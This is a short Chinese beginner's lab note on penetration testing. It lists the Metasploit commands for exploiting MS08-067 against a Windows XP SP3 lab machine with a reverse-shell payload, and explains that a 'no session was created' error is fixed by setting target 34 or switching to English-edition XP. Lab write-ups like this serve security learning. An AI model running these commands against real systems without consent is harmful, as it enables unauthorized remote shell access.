最近准备学习有关渗透测试方面的内容,记录一些自己遇见的问题与解决方法,大佬勿喷。
我在做第一个实验:利用ms08-067入侵靶机,获取控制权时,就遇见了下面这个问题:
Exploit completed, but no session was created
我先把我的命令行加上:
msf5 > use /windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set RhOSTS 192.168.0.106
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell_reverse_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.0.102
msf5 exploit(windows/smb/ms08_067_netapi) > exploit
靶机系统为:Windows XP SP3 中文版
经过各方查阅,得出以下解决方法:
1.如果未设置targets,Metaexploit会使用默认的Exploit Target 0
0 Automatic Targeting
此时要根据靶机版本选择合适的targets,例如这里是靶机系统为:Windows XP SP3 中文版,则只需加一行如下命令
msf5 exploit(windows/smb/ms08_067_netapi) > set target 34
target => 34
然后输入exploit进行攻击即可
2.把靶机换成Windows XP英文版
结果:
鄙人刚刚学渗透,才疏学浅。有什么问题,或者我说的有什么错误大家可以在评论区指出。